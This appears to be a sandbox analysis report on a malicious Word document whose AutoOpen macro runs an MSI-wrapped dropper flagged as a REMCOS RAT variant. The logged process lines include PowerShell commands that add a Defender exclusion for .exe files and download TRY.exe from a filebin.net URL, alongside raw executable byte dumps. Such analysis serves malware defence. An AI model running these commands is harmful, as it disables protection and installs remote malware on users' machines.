H..H..H..3...@8+tiH.....H...\_..H..u....H..H...I_..H..u.H...?.t.H..H........,_..H..t.Hc.H...8.t....H..H.\$0H.l$8H.t$@H.. _.3............H.\$.UVWATAUAVAWH..$....H..p...H......H3.H..`...L..H.EPM..H.MPL+.M..E3.M.......H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.}P"u.H......H.EQ..H......H.EPH.L$0H.D$0.....H.\|$0H...H..H..tlH..H..D8,.u.H...rZ.G..\<:u.8O.t.8.uH:.uDH.D$@L..L+.H.L$@.....H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.ZA.....L......H.D$@A..L+.H.L$@H......H..t.A.....t...H..H...u.H..H.A.L..A..H.E.H
Source: 54841d.msi.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d......&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................................................E3.H.B.A.....A.W...I;.E.G.E..xGH..t"L+.L+.I...H..t.A.....t...H..H...u.H..H.A.H.E.H..E..A..A..z........H..t....A.........E3.L..M..H..A.W...I.B.H=....E.G.E..x5I..H..M..t..8.t.H..H...u.H..H..E..A..E#.H..t.M..L+...E3.E..xXI..I...I+.t.H..M......I+.L..L+.M..t.A.....t...I..H..H...u.H..H.B.H.E.H..E..A..A..z......A.........L.D$.L.L$ SVWH.. 3.H.B.H=....H...W....G...x5H.Z.H..H..L.L$X3.........x.H.H;.w.u.@.<3..@.<3.z.....H..t......H.. _^[..........H.\$.H.l$.VWAVH......H..,...H3.H.D$pL..f.D$l..3.H.........l$h......H..H........H......H....1...H..H..taH.D$`A..H.D$PD.E .l$HH.L$h.l$@.}..l$8A. ....l$0...l$(.l$ ...~....t.H.T$`M..3.H........H.L$`...~..H..........H.L$pH3...i..L..$....I.[(I.k0I..A^_^.........H..H.X.H.p.H.x.L.p UH.h.H......H.."...H3.H.EG..Y...E3.D.u?f.EC..D.u'A.^.;...P...H.M'.........&.........H..L.E/.S....~......!...H.M/H.E+E3.H.D$ E3......}.............~....z.......U+3...<...H..H........D.M+H.E+H.M/L....H.D$ ..t}..........H.E7A. ...H.D$PH.M?D.t$HA. ...D.t$@..D.t$8D.t$0D.t$(D.t$ ..u}....t@A..D97v......H.U7..H..H.L....`}....u...;7r.....*....]'H.M7...}..H....(~..H.M/...}...E'..............E'...E.......H.MGH3...g..L..$....I.[.I.s.I.{ M.s(I..]........H.\$.WH..0...H..d...H3.H..$ ...I..I..H........t!...u.I......I...w.H....U....P3..Q..q...H..H...F4..H..w...L.D$ A......D$ .........L.D$ .?...H....$.................H..$ ...H3...f..H..$H...H..0..._..........H.\$.H.l$.H.t$.WH.. H..H..H..3...@8+tiH.....H...\_..H..u....H..H...I_..H..u.H...?.t.H..H........,_..H..t.Hc.H...8.t....H..H.\$0H.l$8H.t$@H.. _.3............H.\$.UVWATAUAVAWH..$....H..p...H......H3.H..`...L..H.EPM..H.MPL+.M..E3.M.......H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.}P"u.H......H.EQ..H......H.EPH.L$0H.D$0.....H.\|$0H...H..H..tlH..H..D8,.u.H...rZ.G..\<:u.8O.t.8.uH:.uDH.D$@L..L+.H.L$@.....H......H..t.A.....t...H..H...u.H..H.A.H.E.D.(.ZA.....L......H.D$@A..L+.H.L$@H......H..t.A.....t...H..H...u.H..H.A.L..A..H.E.H

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Jump to dropped file

Document contains OLE streams with PE executables

Source: MSI94E.tmp.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MZ signature found
Source: MSI94E.tmp.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479' : MZ signature found
Source: 54841d.msi.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : MZ signature found
Source: 54841d.msi.3.dr	Stream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479' : MZ signature found

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC46028
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC42B24
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC465B0
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC43E4C
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC41C38
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC45940
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC433C0
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC41B44

Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: MSI94E.tmp.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 54841d.msi.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: inprogressinstallinfo.ipi.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TRY.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE	Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE	Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP, type: DROPPED	Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP, type: DROPPED	Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI847A.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC429E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Code function: 12_2_00007FF6BAC41B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\MSI94E.tmp

Jump to behavior

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE, VBA macro line: Sub AutoOpen()

Source: bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 289 bytes, 1 file

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE indicator, VBA macros: true
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE indicator, VBA macros: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.winDOC@26/45@4/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC44478 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,GetLastError,FormatMessageA,

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42B24 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceA,LoadResource,#17,

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE document summary: title field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE document summary: author field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	OLE document summary: edited time not present or 0
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF3D7E64A57D9B524A.TMP.0.dr	OLE document summary: edited time not present or 0
Source: MSI94E.tmp.3.dr	OLE document summary: edited time not present or 0
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DFAC439D90DB59E05A.TMP.3.dr	OLE document summary: edited time not present or 0
Source: 54841d.msi.3.dr	OLE document summary: edited time not present or 0
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DF20725BC976A732BA.TMP.3.dr	OLE document summary: edited time not present or 0
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DFAB5AE087B19AB60D.TMP.3.dr	OLE document summary: edited time not present or 0
Source: inprogressinstallinfo.ipi.3.dr	OLE document summary: title field not present or empty
Source: inprogressinstallinfo.ipi.3.dr	OLE document summary: author field not present or empty
Source: inprogressinstallinfo.ipi.3.dr	OLE document summary: edited time not present or 0
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DFFFE9197EB1FCF16E.TMP.3.dr	OLE document summary: edited time not present or 0
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE document summary: title field not present or empty
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE document summary: author field not present or empty
Source: ~DF3B9CC377E0CCEDD0.TMP.3.dr	OLE document summary: edited time not present or 0

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	Virustotal: Detection: 37%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	ReversingLabs: Detection: 24%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files"
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC41B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{A559FA68-485E-4389-9260-96E7FBE1259F} - OProcSessId.dat

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC46028 LocalAlloc,GetLastError,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:632:120:WilError_01

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\msiwrapper.ini

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: MSI94E.tmp.3.dr

Initial sample: OLE summary template = Intel;1033

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: wextract.pdb source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: wextract.pdbGCTL source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSIFECD.tmp.3.dr, MSI1064.tmp.3.dr, MSI847A.tmp.3.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr

Source: MSI94E.tmp.3.dr

Initial sample: OLE summary keywords = Installer

Source: MSI94E.tmp.3.dr

Initial sample: OLE summary subject = Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com

Source: MSI94E.tmp.3.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI847A.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\fd1981f4a71244758e929e11db0d4f1d$dpx$.tmp\bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1064.tmp	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFECD.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI847A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1064.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFECD.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC415F8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
